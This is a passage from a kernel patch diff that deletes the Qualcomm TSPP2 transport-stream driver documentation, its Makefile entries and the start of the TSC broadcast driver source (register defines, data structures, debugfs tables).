--the SPS driver to configure and manage the BAM unit, which is used to perform
--DMA operations and move TS data to/from system memory.
--
--The TSPP2 driver uses the ION driver to control the IOMMU and map user-allocated
--buffers to the TSPP2 IOMMU domain.
--
--The TSPP2 is a standard Linux platform device driver. It can be configured as a
--loadable or built-in kernel module. The driver is supported only in platforms
--that contain the TSPP2 HW.
--
--The driver provides an abstraction of the TSPP2 HW functionality for
--kernel-space clients. For example, the dvb/demux kernel driver, which provides
--an API for upper layers to perform TS de-multiplexing (including PID filtering,
--recording, indexing etc.), uses the TSPP2 driver to utilize the TSPP2 HW and
--offload the CPU, instead of doing all the required processing in SW.
--
--For further information please refer to Documentation/dvb/qcom-mpq.txt.
--
--Terminology
-------------
--This section describes some of the software "objects" implemented by the driver.
--
--a. TSPP2 device: an instance of the TSPP2 device representing the TSPP2 HW and
--its capabilities. The client identifies a device instance according to a
--device ID.
--
--b. Indexing table: A TSPP2 device contains 4 indexing tables. These tables are
--used to identify patterns in the video stream and report on them.
--The client identifies an indexing table according to a table ID.
--
--c. Pipe: a BAM pipe used for DMA operations. The TSPP2 HW has a BAM unit with
--31 pipes. A pipe contains a memory buffer and a corresponding descriptor ring,
--and is used as the output for TSPP2 data (e.g. PES payload, PES headers,
--indexing information etc.). For memory inputs, a pipe is used as the input
--buffer where data can be written to for TSPP2 processing. BAM Pipes are
--managed by the TSPP2 driver using the SPS driver which controls BAM HW. The
--client is responsible for buffer memory allocation, and can control many
--BAM-related pipe parameters.
--
--d.
Source: a source object represents data "stream" from the TS input,
--through the filters and operations that perform the processing on the TS data,
--until the output. A source has the following properties:
-- - Either a TSIF or a memory input.
-- - For memory input: an input pipe.
-- - Source-related configuration (e.g., packet size and format).
-- - One or more PID filters. Each filter contains operations.
-- - One or more output pipes.
--The client is responsible to configure the source object as needed using the
--appropriate API. The client identifies a source using a source handle, which
--the driver provides when opening a source for use.
--
--e. Filter: a filter object represents a PID filter which is used to get only the
--TS packets with specific PIDs and filter out all other TS packets in the stream.
--The client adds filters to the source object to define the processing of data.
--Each filter has a 13-bit PID value and bit-mask, so a filter can be used to
--get TS packets with various PID values. Note, however, that it is highly
--recommended to use each filter with a unique PID (i.e., 0x1FFF mask), and it is
--mandatory that the PIDs handled by each source's filters are mutually exclusive
--(i.e., the client must not configure two filters in the same source that handle
--the same PID values). A filter has up to 16 operations that instruct the TSPP2
--HW how to process the data. The client identifies a filter using a filter
--handle, which the driver provides when opening a filter for use.
--
--f. Operation: an operation object represents a basic building block describing
--how data is processed. Operations are added to a filter and are performed on
--the data received by this filter, in the order they were added. One or more
--operations may be required to achieve the desired functionality.
For example,
--a "section filtering" functionality requires a raw transmit operation, while a
--"recording" functionality requires a raw transmit operations as well as an
--indexing operation (to support trick modes).
--
--Driver initialization
----------------------
--The driver's probe function is invoked if there is a matching device tree node
--(or platform device). The probe function gets the required memory resources
--(i.e., register address spaces) and maps them to kernel space for the
--driver's use. The probe function also request the required IRQs and gets the
--TSPP2 IOMMU domain. Finally, the probe function resets all HW registers to
--appropriate default values, and resets all the required software structures.
--
--See API description in Interface section.
--
--Usage examples
---------------
--
--Section filtering example - opening a Raw filter with data from TSIF0:
-----------------------------------------------------------------------
--u32 dev_id = 0;
--u32 src_handle;
--u32 pipe_handle;
--u32 filter_handle;
--u32 iova;
--u32 vaddress;
--struct tspp2_config cfg = {...};
--struct tspp2_pipe_config_params pipe_config;
--struct tspp2_pipe_pull_mode_params pull_params = {0, 0};
--struct tspp2_operation raw_op;
--struct sps_event_notify event;
--struct sps_iovec desc;
--
--/* Open TSPP2 device for use */
--tspp2_device_open(dev_id);
--
--/* Set global configuration */
--tspp2_config_set(dev_id, &cfg);
--
--/* Open source with TSIF0 input */
--tspp2_src_open(dev_id, TSPP2_INPUT_TSIF0, &src_handle);
--
--/* Set parsing options if needed, for example: */
--tspp2_src_parsing_option_set(src_handle,
-- TSPP2_SRC_PARSING_OPT_CHECK_CONTINUITY, 1);
--
--/* Assume normal sync byte, assume no need for scrambling configuration */
--
--/* Set packet size and format: */
--tspp2_src_packet_format_set(src_handle, TSPP2_PACKET_FORMAT_188_RAW);
--
--/* Since this is TSIF input, flow control is in push mode */
--
--/* Allocate memory for output pipe via ION – not shown
here */
--
--/* Open an output pipe for use */
--pipe_config.ion_client = ...
--pipe_config.buffer_handle = ...
--pipe_config.buffer_size = ...
--pipe_config.pipe_mode = TSPP2_SRC_PIPE_OUTPUT;
--pipe_config.sps_cfg.descriptor_size = 188;
--pipe_config.sps_cfg.setting = (SPS_O_AUTO_ENABLE | SPS_O_HYBRID |
-- SPS_O_OUT_OF_DESC | SPS_O_ACK_TRANSFERS);
--pipe_config.sps_cfg.wakeup_events = SPS_O_OUT_OF_DESC;
--pipe_config.sps_cfg.callback = ...
--pipe_config.sps_cfg.user_info = ...
--tspp2_pipe_open(dev_id, &pipe_config, &iova, &pipe_handle);
--
--/* Attache the pipe to the source */
--tspp2_src_pipe_attach(src_handle, pipe_handle, &pull_params);
--/* Open a filter for PID 13 */
--tspp2_filter_open(src_handle, 13, 0x1FFF, &filter_handle);
--
--/* Add a raw transmit operation */
--raw_op.type = TSPP2_OP_RAW_TRANSMIT;
--raw_op.params.raw_transmit.input = TSPP2_OP_BUFFER_A;
--raw_op.params.raw_transmit.timestamp_mode = TSPP2_OP_TIMESTAMP_NONE;
--raw_op.params.raw_transmit.skip_ts_packets_with_errors = 0;
--raw_op.params.raw_transmit.output_pipe_handle = pipe_handle;
--tspp2_filter_operations_add(filter_handle, &raw_op, 1);
--
--/* Enable filter and source to start getting data */
--tspp2_filter_enable(filter_handle);
--tspp2_source_enable(src_handle);
--
--/*
-- * Data path: poll pipe (or get notifications from pipe via
-- * registered callback).
-- */
--tspp2_pipe_last_address_used_get(pipe_handle, &vaddress);
--
--/* Process data... */
--
--/* Get and release descriptors: */
--tspp2_pipe_descriptor_get(pipe_handle, &desc);
--tspp2_pipe_descriptor_put(pipe_handle, desc.addr, desc.size, ...);
--
--/* Teardown: */
--tspp2_src_disable(src_handle);
--tspp2_filter_disable(filter_handle);
--tspp2_filter_close(filter_handle);
--tspp2_src_pipe_detach(src_handle, pipe_handle);
--tspp2_pipe_close(pipe_handle);
--tspp2_src_close(src_handle);
--tspp2_device_close(dev_id);
--
--Debug facilities
------------------
--The TSPP2 driver supports several debug facilities via debugfs:
--a.
Ability to read the status of TSIF and TSPP2 HW registers via debugfs.
--b. Ability to print HW statistics, error and performance counters via debugfs.
--c. Ability to print SW status via debugfs.
--
--Design
--======
--The TSPP2 driver is a regular Linux platform driver designed to support the
--TSPP2 HW available on specific Qualcomm SoCs.
--
--The driver provides an extensive kernel-space API to allow the client full
--control over the configuration of the TSPP2 HW, while encapsulating HW
--implementation details that are not relevant to the client.
--
--The driver enforces HW restrictions and checks for input parameters
--validity, providing a success or failure return value for each API function.
--However, the driver does not enforce any high-level policy with regard to the
--correct use of the TSPP2 HW for various use-cases.
--
--Power Management
--================
--The TSPP2 driver prevents the CPU from sleeping while the HW is active by
--using the wakeup_source API. When the HW is not active (i.e., no sources
--configured), the driver indicates it is ready for system suspend by invoking
--__pm_relax(). When the HW needs to be active (i.e., a source has been opened and
--enabled), the driver invokes __pm_stay_awake().
--
--In a similar manner, the driver enables the HW clocks only when needed.
--The TSPP2 HW manages power saving automatically when the HW is not used.
--No SW involvement is required.
--
--SMP/multi-core
--==============
--The driver uses a mutex for mutual exclusion between kernel API calls.
--A spinlock is used to protect accesses to its internal databases which can be
--performed both from interrupt handler context and from API context.
--
--Security
--========
--None.
--
--Performance
--===========
--Control operations are not considered as performance critical.
--Most of the control operations are assumed to be fairly uncommon.
--Data-path operations involve only getting descriptors from the pipe and
--releasing them back to the pipe for reuse.
--
--Interface
--=========
--Kernel-space API
------------------
--
--Control path API
---------------------
--
--TSPP2 device open / close API:
--------------------------------
--int tspp2_device_open(u32 dev_id);
--
--int tspp2_device_close(u32 dev_id);
--
--Global configuration for the TSPP2 device:
--------------------------------------------
--int tspp2_config_set(u32 dev_id, const struct tspp2_config *cfg);
-- Set device global configuration.
--
--int tspp2_config_get(u32 dev_id, struct tspp2_config *cfg);
-- Get current device global configuration.
--
--Configure Indexing Tables:
----------------------------
--int tspp2_indexing_prefix_set(u32 dev_id, u8 table_id, u32 value, u32 mask);
-- Set prefix value and mask of an indexing table.
--
--int tspp2_indexing_patterns_add(u32 dev_id, u8 table_id, const u32 *values,
-- const u32 *masks, u8 patterns_num);
-- Add patterns to an indexing table.
--
--int tspp2_indexing_patterns_clear(u32 dev_id, u8 table_id);
-- Clear all patterns of an indexing table
--
--Opening and closing Pipes:
----------------------------
--int tspp2_pipe_open(u32 dev_id, const struct tspp2_pipe_config_params *cfg,
-- u32 *iova, u32 *pipe_handle);
-- Open a pipe for use.
--
--int tspp2_pipe_close(u32 pipe_handle);
-- Close an opened pipe.
--
--Source configuration:
-----------------------
--int tspp2_src_open(u32 dev_id, enum tspp2_src_input input, u32 *src_handle);
-- Open a new source for use.
--
--int tspp2_src_close(u32 src_handle);
-- Close an opened source.
--
--int tspp2_src_parsing_option_set(u32 src_handle,
-- enum tspp2_src_parsing_option option, int value);
-- Set source parsing configuration option.
--
--int tspp2_src_parsing_option_get(u32 src_handle,
-- enum tspp2_src_parsing_option option, int *value);
-- Get source parsing configuration option.
--
--int tspp2_src_sync_byte_config_set(u32 src_handle, int check_sync_byte,
-- u8 sync_byte_value);
-- Set source sync byte configuration.
--
--int tspp2_src_sync_byte_config_get(u32 src_handle, int *check_sync_byte,
-- u8 *sync_byte_value);
-- Get source sync byte configuration.
--
--int tspp2_src_scrambling_config_set(u32 src_handle,
-- const struct tspp2_src_scrambling_config *cfg);
-- Set source scrambling configuration.
--
--int tspp2_src_scrambling_config_get(u32 src_handle,
-- struct tspp2_src_scrambling_config *cfg);
-- Get source scrambling configuration.
--
--int tspp2_src_packet_format_set(u32 src_handle,
-- enum tspp2_packet_format format);
-- Set source packet size and format.
--
--int tspp2_src_pipe_attach(u32 src_handle, u32 pipe_handle,
-- const struct tspp2_pipe_pull_mode_params *cfg);
-- Attach a pipe to a source.
--
--int tspp2_src_pipe_detach(u32 src_handle, u32 pipe_handle);
-- Detach a pipe from a source.
--
--int tspp2_src_enable(u32 src_handle);
-- Enable source (start using it).
--
--int tspp2_src_disable(u32 src_handle);
-- Disable source (stop using it).
--
--int tspp2_src_filters_clear(u32 src_handle);
-- Clear all filters from a source.
--
--Filter and Operation configuration:
-------------------------------------
--int tspp2_filter_open(u32 src_handle, u16 pid, u16 mask, u32 *filter_handle);
-- Open a new filter and add it to a source.
--
--int tspp2_filter_close(u32 filter_handle);
-- Close a filter.
--
--int tspp2_filter_enable(u32 filter_handle);
-- Enable a filter.
--
--int tspp2_filter_disable(u32 filter_handle);
-- Disable a filter.
--
--int tspp2_filter_operations_set(u32 filter_handle,
-- const struct tspp2_operation *ops, u8 operations_num);
-- Set (add or update) operations to a filter.
--
--int tspp2_filter_operations_clear(u32 filter_handle);
-- Clear all operations from a filter.
--
--int tspp2_filter_current_scrambling_bits_get(u32 filter_handle,
-- u8 *scrambling_bits_value);
-- Get the current scrambling bits.
--
--Events notifications registration:
------------------------------------
--int tspp2_global_event_notification_register(u32 dev_id,
-- u32 global_event_bitmask,
-- void (*callback)(void *cookie),
-- void *cookie);
-- Get notified on a global event.
--
--int tspp2_src_event_notification_register(u32 src_handle,
-- u32 src_event_bitmask,
-- void (*callback)(void *cookie),
-- void *cookie);
-- Get notified on a source event.
--
--int tspp2_filter_event_notification_register(u32 filter_handle,
-- u32 filter_event_bitmask,
-- void (*callback)(void *cookie),
-- void *cookie);
-- Get notified on a filter event.
--
--Data path API
------------------
--int tspp2_pipe_descriptor_get(u32 pipe_handle, struct sps_iovec *desc);
-- Get a data descriptor from a pipe.
--
--int tspp2_pipe_descriptor_put(u32 pipe_handle, u32 addr,
-- u32 size, u32 flags);
-- Put (release) a descriptor for reuse by the pipe.
--
--int tspp2_pipe_last_address_used_get(u32 pipe_handle, u32 *address);
-- Get the last address the TSPP2 used.
--
--int tspp2_data_write(u32 src_handle, u32 offset, u32 size);
-- Write (feed) data to a source.
--
--User-space API
---------------
--The TSPP2 driver does not provide any user-space API, only a kernel-space API.
--The dvb/demux driver, which utilizes the TSPP2 driver (and HW), provides an
--extensive user-space API, allowing upper layers to achieve complex demuxing
--functionality.
--
--For further information please refer to Documentation/dvb/qcom-mpq.txt.
--
--Driver parameters
--=================
--The TSPP2 driver supports the following module parameter:
--tspp2_iommu_bypass: Bypass VBIF/IOMMU and use physical buffer addresses
--instead. This is mostly useful for debug purposes if something is wrong with
--the IOMMU configuration. Default is false.
--
--Platform-dependent parameters (e.g., IRQ numbers) are provided to the driver
--via the device tree mechanism or the platform device data mechanism.
--
--Config options
--==============
--To enable the driver, set CONFIG_TSPP2 to y (built-in) or m (kernel module)
--in the kernel configuration menu.
--
--Dependencies
--============
--a. The TSPP2 driver uses the SPS driver to control the BAM unit.
--b. The TSPP2 driver uses the ION driver for IOMMU registration and buffer
--mapping. The client is responsible to allocate memory buffers via ION.
--
--User space utilities
--====================
--None.
--
--Other
--=====
--None.
--
--Known issues
--============
--None.
--
--To do
--=====
--None.
-diff --git a/drivers/media/platform/msm/broadcast/Makefile b/drivers/media/platform/msm/broadcast/Makefile
-index 1233d6d..5e72b0d 100644
---- a/drivers/media/platform/msm/broadcast/Makefile
-+++ b/drivers/media/platform/msm/broadcast/Makefile
-@@ -3,9 +3,7 @@
- #
-
- obj-$(CONFIG_TSPP) += tspp.o
--obj-$(CONFIG_TSPP2) += tspp2.o
- obj-$(CONFIG_CI_BRIDGE_SPI) += ci-bridge-spi.o
--obj-$(CONFIG_TSC) += tsc.o
- obj-$(CONFIG_ENSIGMA_UCCP_330) += ensigma_uccp330.o
- obj-$(CONFIG_DEMOD_WRAPPER) += demod_wrapper.o
-
-diff --git a/drivers/media/platform/msm/broadcast/tsc.c b/drivers/media/platform/msm/broadcast/tsc.c
-deleted file mode 100644
-index ec3142e..0000000
---- a/drivers/media/platform/msm/broadcast/tsc.c
-+++ /dev/null
-@@ -1,3450 +0,0 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include
--#include
--#include
--#include /* Device drivers need this */
--#include /* Char device drivers need that */
--#include /* for KERN_INFO */
--#include
--#include /* for completion signaling after interrupts */
--#include /* for copy from/to user in the ioctls */
--#include
--#include
--#include /* parsing device tree data */
--#include
--#include
--#include /* gpios definitions */
--#include /* pinctrl API */
--#include
--#include /* wait() macros, sleeping */
--#include /* Externally defined globals */
--#include /* poll() file op */
--#include /* IO macros */
--#include
--#include /* ion_map_iommu */
--#include
--#include
--#include /* kfree, kzalloc */
--#include /* debugfs support */
--#include /* debugfs support */
--#include /* debugfs support */
--#include /* gdsc */
--#include /* bus client */
--#include /* usleep function */
--/* TODO: include after MCU is mainlined */
--
--/*
-- * General defines
-- */
--#define TEST_BIT(pos, number) (number & (1 << pos))
--#define CLEAR_BIT(pos, number) (number &= ~(1 << pos))
--#define SET_BIT(pos, number) (number |= 1 << pos)
--
--/*
-- * extract bits [@b0:@b1] (inclusive) from the value @x
-- * it should be @b0 <= @b1, or result is incorrect
-- */
--static inline u32 GETL_BITS(u32 x, int b0, int b1)
--{
-- return (x >> b0) & ((1 << (b1 - b0 + 1)) - 1);
--}
--
--/* Bypass VBIF/IOMMU for debug and bring-up purposes */
--static int tsc_iommu_bypass; /* defualt=0 using iommu */
--module_param(tsc_iommu_bypass, int, S_IRUGO | S_IWUSR | S_IWGRP);
--
--/* The rate of the clock that control TS from TSC to the CAM */
--#define CICAM_CLK_RATE_12MHZ 12000000
--#define CICAM_CLK_RATE_9MHZ 8971962
--#define CICAM_CLK_RATE_7MHZ 7218045
--/* Rates for TSC serial and parallel clocks */
--#define TSC_SER_CLK_RATE 192000000
--#define TSC_PAR_CLK_RATE 24000000
--
--/* CICAM address space according to CI specification */
--#define CICAM_MAX_ADDRESS 3
--
--/*
-- * TSC register offsets
-- */
--#define TSC_HW_VERSION
(0x0)
--#define TSC_MUX_CFG (0x4) /* Muxs config */
--#define TSC_IN_IFC_EXT (0x8) /* External demods tsifs */
--#define TSC_IN_IFC_CFG_INT (0xc) /* internal demods and
-- cicam tsif config */
--#define TSC_FSM_STATE (0x50) /* Read FSM state */
--#define TSC_FSM_STATE_MASK (0x54) /* Config FSM state */
--#define TSC_CAM_CMD (0x1000)/* Config cam commands */
--#define TSC_CAM_RD_DATA (0x1004)/* read data for single-mode
-- byte */
--#define TSC_STAT (0x1008)/* Interrupts status */
--#define TSC_IRQ_ENA (0x100C)/* Enable interrupts */
--#define TSC_IRQ_CLR (0x1010)/* Clear interrupts */
--#define TSC_CIP_CFG (0x1014)/* Enable HW polling */
--#define TSC_CD_STAT (0x1020)/* Card pins status */
--#define TSC_RD_BUFF_ADDR (0x1024)/* Vbif address for read
-- buffer */
--#define TSC_WR_BUFF_ADDR (0x1028)/* Vbif address for write
-- buffer */
--#define TSC_FALSE_CD (0x102C)/* Counter of false card
-- detection */
--#define TSC_FALSE_CD_CLR (0x1030)/* Clear false cd counter */
--#define TSC_RESP_ERR (0x1034)/* State of read/write buffer
-- error */
--#define TSC_CICAM_TSIF (0x1038)/* Enable tsif (tsc->cam) */
--
--
--/*
-- * Registers structure definitions
-- */
--
--/* TSC_MUX_CFG */
--#define MUX_EXTERNAL_DEMOD_0 0
--#define MUX_EXTERNAL_DEMOD_1 1
--#define MUX_INTERNAL_DEMOD 2
--#define MUX_CICAM 3
--#define MUX0_OFFS 0
--#define MUX1_OFFS 2
--#define MUX_CAM_OFFS 4
--
--/* TSC_IN_IFC_EXT and TSC_IN_IFC_CFG_INT*/
--#define TSIF_INPUT_ENABLE 0
--#define TSIF_INPUT_DISABLE 1
--
--#define TSIF_CLK_POL_OFFS 0
--#define TSIF_DATA_POL_OFFS 1
--#define TSIF_START_POL_OFFS 2
--#define TSIF_VALID_POL_OFFS 3
--#define TSIF_ERROR_POL_OFFS 4
--#define TSIF_SER_PAR_OFFS 5
--#define TSIF_REC_MODE_OFFS 6
--#define TSIF_DATA_SWAP_OFFS 8
--#define TSIF_DISABLE_OFFS 9
--#define TSIF_ERR_INSERT_OFFS 10
--
--/* TSC_FSM_STATE and TSC_FSM_STATE_MASK*/
--#define FSM_STATE_BUFFER_BEG 0
--#define FSM_STATE_BUFFER_END 3
--#define FSM_STATE_POLL_BEG 8
--#define FSM_STATE_POLL_END 10
--#define
FSM_STATE_BYTE_BEG 12
--#define FSM_STATE_BYTE_END 13
--#define FSM_STATE_MEM_WR_BEG 16
--#define FSM_STATE_MEM_WR_END 17
--#define FSM_STATE_MEM_RD_BEG 20
--#define FSM_STATE_MEM_RD_END 21
--#define FSM_STATE_IO_RD_BEG 24
--#define FSM_STATE_IO_RD_END 25
--#define FSM_STATE_IO_WR_BEG 28
--#define FSM_STATE_IO_WR_END 29
--
--/* TSC_CAM_CMD */
--#define MEMORY_TRANSACTION 0
--#define IO_TRANSACTION 1
--#define WRITE_TRANSACTION 0
--#define READ_TRANSACTION 1
--#define SINGLE_BYTE_MODE 0
--#define BUFFER_MODE 1
--
--#define CAM_CMD_ADDR_SIZE_OFFS 0
--#define CAM_CMD_WR_DATA_OFFS 16
--#define CAM_CMD_IO_MEM_OFFS 24
--#define CAM_CMD_RD_WR_OFFS 25
--#define CAM_CMD_BUFF_MODE_OFFS 26
--#define CAM_CMD_ABORT 27
--
--/* TSC_STAT, TSC_IRQ_ENA and TSC_IRQ_CLR */
--#define CAM_IRQ_EOT_OFFS 0
--#define CAM_IRQ_POLL_OFFS 1
--#define CAM_IRQ_RATE_MISMATCH_OFFS 2
--#define CAM_IRQ_ERR_OFFS 3
--#define CAM_IRQ_ABORTED_OFFS 4
--
--/* TSC_CD_STAT */
--#define TSC_CD_STAT_INSERT 0x00
--#define TSC_CD_STAT_ERROR1 0x01
--#define TSC_CD_STAT_ERROR2 0x02
--#define TSC_CD_STAT_REMOVE 0x03
--
--#define TSC_CD_BEG 0
--#define TSC_CD_END 1
--
--/* TSC_CICAM_TSIF */
--#define TSC_CICAM_TSIF_OE_OFFS 0
--
--/* Data structures */
--
--/**
-- * enum transaction_state - states for the transacation interrupt reason
-- */
--enum transaction_state {
-- BEFORE_TRANSACTION = 0,
-- TRANSACTION_SUCCESS = 1,
-- TRANSACTION_ERROR = -1,
-- TRANSACTION_CARD_REMOVED = -2
--};
--
--/**
--* enum pcmcia_state - states for the pcmcia pinctrl states
--* Note: the numbers here corresponds to the numbers of enum tsc_cam_personality
--* in tsc.h file.
--*/
--enum pcmcia_state {
-- PCMCIA_STATE_DISABLE = 0,
-- PCMCIA_STATE_CI_CARD = 1,
-- PCMCIA_STATE_CI_PLUS = 2,
-- PCMCIA_STATE_PC_CARD = 3
--};
--
--/**
-- * struct iommu_info - manage all the iommu information
-- *
-- * @group: TSC IOMMU group.
-- * @domain: TSC IOMMU domain.
-- * @domain_num: TSC IOMMU domain number.
-- * @partition_num: TSC iommu partition number.
-- * @ion_client: TSC IOMMU client.
-- * @iommu_group_name TSC IOMMU group name.
-- */
--struct iommu_info {
-- struct iommu_group *group;
-- struct iommu_domain *domain;
-- int domain_num;
-- int partition_num;
-- struct ion_client *ion_client;
-- const char *iommu_group_name;
--};
--
--/**
-- * struct pinctrl_current_state - represent which TLMM pins currently active
-- *
-- * @ts0: true if TS-in 0 is active, false otherwise.
-- * @ts1: true if TS-in 1 is active, false otherwise.
-- * @pcmcia_state: Represent the pcmcia pins state.
-- */
--struct pinctrl_current_state {
-- bool ts0;
-- bool ts1;
-- enum pcmcia_state pcmcia_state;
--};
--/**
-- * struct pinctrl_info - manage all the pinctrl information
-- *
-- * @pinctrl: TSC pinctrl state holder.
-- * @disable: pinctrl state to disable all the pins.
-- * @ts0: pinctrl state to activate TS-in 0 alone.
-- * @ts1: pinctrl state to activate TS-in 1 alone.
-- * @dual_ts: pinctrl state to activate both TS-in.
-- * @pc_card: pinctrl state to activate pcmcia upon card insertion.
-- * @ci_card: pinctrl state to activate pcmcia after personality
-- * change to CI card.
-- * @ci_plus: pinctrl state to activate pcmcia after personality
-- * change to CI+ card.
-- * @ts0_pc_card: pinctrl state to activate TS-in 0 and pcmcia upon card
-- * insertion.
-- * @ts0_ci_card: pinctrl state to activate TS-in 0 and pcmcia after
-- * personality change to CI card.
-- * @ts0_ci_plus: pinctrl state to activate TS-in 0 and pcmcia after
-- * personality change to CI+ card.
-- * @ts1_pc_card: pinctrl state to activate TS-in 1 and pcmcia upon card
-- * insertion.
-- * @ts1_ci_card: pinctrl state to activate TS-in 1 and pcmcia after
-- * personality change to CI card.
-- * @ts1_ci_plus: pinctrl state to activate TS-in 1 and pcmcia after
-- * personality change to CI+ card.
-- * @dual_ts_pc_card: pinctrl state to activate both TS-in and pcmcia upon
-- * card insertion.
-- * @dual_ts_ci_card: pinctrl state to activate both TS-in and pcmcia after
-- * personality change to CI card.
-- * @dual_ts_ci_plus: pinctrl state to activate both TS-in and pcmcia after
-- * personality change to CI+ card.
-- * @is_ts0: true if ts0 pinctrl states exist in device tree, false
-- * otherwise.
-- * @is_ts1: true if ts1 pinctrl states exist in device tree, false
-- * otherwise.
-- * @is_pcmcia: true if pcmcia pinctrl states exist in device tree,
-- * false otherwise.
-- * @curr_state: the current state of the TLMM pins.
-- */
--struct pinctrl_info {
-- struct pinctrl *pinctrl;
-- struct pinctrl_state *disable;
-- struct pinctrl_state *ts0;
-- struct pinctrl_state *ts1;
-- struct pinctrl_state *dual_ts;
-- struct pinctrl_state *pc_card;
-- struct pinctrl_state *ci_card;
-- struct pinctrl_state *ci_plus;
-- struct pinctrl_state *ts0_pc_card;
-- struct pinctrl_state *ts0_ci_card;
-- struct pinctrl_state *ts0_ci_plus;
-- struct pinctrl_state *ts1_pc_card;
-- struct pinctrl_state *ts1_ci_card;
-- struct pinctrl_state *ts1_ci_plus;
-- struct pinctrl_state *dual_ts_pc_card;
-- struct pinctrl_state *dual_ts_ci_card;
-- struct pinctrl_state *dual_ts_ci_plus;
-- bool is_ts0;
-- bool is_ts1;
-- bool is_pcmcia;
-- struct pinctrl_current_state curr_state;
--};
--
--/**
-- * struct tsc_mux_chdev - TSC Mux character device
-- *
-- * @cdev: TSC Mux cdev.
-- * @mutex: A mutex for mutual exclusion between Mux API calls.
-- * @poll_queue: Waiting queue for rate mismatch interrupt.
-- * @spinlock: A spinlock to protect accesses to
-- * data structures that happen from APIs and ISRs.
-- * @rate_interrupt: A flag indicating if rate mismatch interrupt received.
-- */
--struct tsc_mux_chdev {
-- struct cdev cdev;
-- struct mutex mutex;
-- wait_queue_head_t poll_queue;
-- spinlock_t spinlock;
-- bool rate_interrupt;
--};
--
--/**
-- * struct tsc_ci_chdev - TSC CI character device
-- *
-- * @cdev: TSC CI cdev.
-- * @mutex: A mutex for mutual exclusion between CI API calls.
-- * @poll_queue: Waiting queue for card detection interrupt.
-- * @spinlock: A spinlock to protect accesses to data structures that
-- * happen from APIs and ISRs.
-- * @transaction_complete: A completion struct indicating end of data
-- * transaction.
-- * @transaction_finish: A completion struct indicating data transaction func
-- * has finished.
-- * @transaction_state: flag indicating the reason for transaction end.
-- * @ci_card_status: The last card status received by the upper layer.
-- * @data_busy: true when the device is in the middle of data
-- * transaction operation, false otherwise.
-- */
--struct tsc_ci_chdev {
-- struct cdev cdev;
-- struct mutex mutex;
-- wait_queue_head_t poll_queue;
-- spinlock_t spinlock;
-- struct completion transaction_complete;
-- struct completion transaction_finish;
-- enum transaction_state transaction_state;
-- enum tsc_card_status card_status;
-- bool data_busy;
--};
--
--/**
-- * struct tsc_device - TSC device
-- *
-- * @pdev: TSC platform device.
-- * @device_mux: Mux device for sysfs and /dev entry.
-- * @device_ci: CI device for sysfs and /dev entry.
-- * @mux_chdev: TSC Mux character device instance.
-- * @ci_chdev: TSC CI character device instance.
-- * @mux_device_number: TSC Mux major number.
-- * @ci_device_number: TSC CI major number.
-- * @num_mux_opened: A counter to ensure 1 TSC Mux character device.
-- * @num_ci_opened: A counter to ensure 1 TSC CI character device.
-- * @num_device_open: A counter to synch init of power and bus voting.
-- * @mutex: Global mutex to to synch init of power and bus voting.
-- * @base: Base memory address for the TSC registers.
-- * @card_detection_irq: Interrupt No. of the card detection interrupt.
-- * @cam_cmd_irq: Interrupt No. of the cam cmd interrupt.
-- * @iommu_info: TSC IOMMU parameters.
-- * @ahb_clk: The clock for accessing the TSC registers.
-- * @ci_clk: The clock for TSC internal logic.
-- * @ser_clk: The clock for synchronizing serial TS input.
-- * @par_clk: The clock for synchronizing parallel TS input.
-- * @cicam_ts_clk: The clock for pushing TS data into the cicam.
-- * @tspp2_core_clk: The clock for enabling the TSPP2.
-- * @vbif_tspp2_clk: The clock for accessing the VBIF.
-- * @vbif_ahb_clk: The clock for VBIF AHB.
-- * @vbif_axi_clk: The clock for VBIF AXI.
-- * @gdsc: The Broadcast GDSC.
-- * @bus_client: The TSC bus client.
-- * @pinctrl_info: TSC pinctrl parameters.
-- * @reset_cam_gpio: GPIO No. for CAM HW reset.
-- * @hw_card_status: The card status as reflected by the HW registers.
-- * @card_power: True if the card is powered up, false otherwise.
-- * @debugfs_entry: TSC device debugfs entry.
-- */
--struct tsc_device {
-- struct platform_device *pdev;
-- struct device *device_mux;
-- struct device *device_ci;
-- struct tsc_mux_chdev mux_chdev;
-- struct tsc_ci_chdev ci_chdev;
-- dev_t mux_device_number;
-- dev_t ci_device_number;
-- int num_mux_opened;
-- int num_ci_opened;
-- int num_device_open;
-- struct mutex mutex;
-- void __iomem *base;
-- unsigned int card_detection_irq;
-- unsigned int cam_cmd_irq;
-- struct iommu_info iommu_info;
-- struct clk *ahb_clk;
-- struct clk *ci_clk;
-- struct clk *ser_clk;
-- struct clk *par_clk;
-- struct clk *cicam_ts_clk;
-- struct clk *tspp2_core_clk;
-- struct clk *vbif_tspp2_clk;
-- struct clk *vbif_ahb_clk;
-- struct clk *vbif_axi_clk;
-- struct regulator *gdsc;
-- uint32_t bus_client;
-- struct pinctrl_info pinctrl_info;
-- int reset_cam_gpio;
-- enum tsc_card_status hw_card_status;
-- bool card_power;
-- struct dentry *debugfs_entry;
--};
--
--/* Global TSC device class */
--static struct class *tsc_class;
--
--/* Global TSC device database */
--static struct tsc_device *tsc_device;
--
--/************************** Debugfs Support **************************/
--/* debugfs entries */
--#define TSC_S_RW (S_IRUGO | S_IWUSR)
--
--struct debugfs_entry {
-- const char *name;
-- mode_t mode;
-- int offset;
--};
--
--static const struct debugfs_entry
tsc_regs_32[] = {
-- {"tsc_hw_version", S_IRUGO, TSC_HW_VERSION},
-- {"tsc_mux", TSC_S_RW, TSC_MUX_CFG},
-- {"tsif_external_demods", TSC_S_RW, TSC_IN_IFC_EXT},
-- {"tsif_internal_demod_cam", TSC_S_RW, TSC_IN_IFC_CFG_INT},
-- {"tsc_fsm_state", S_IRUGO, TSC_FSM_STATE},
-- {"tsc_fsm_state_mask", TSC_S_RW, TSC_FSM_STATE_MASK},
-- {"tsc_cam_cmd", TSC_S_RW, TSC_CAM_CMD},
-- {"tsc_rd_buff_addr", TSC_S_RW, TSC_RD_BUFF_ADDR},
-- {"tsc_wr_buff_addr", TSC_S_RW, TSC_WR_BUFF_ADDR},
--};
--
--static const struct debugfs_entry tsc_regs_16[] = {
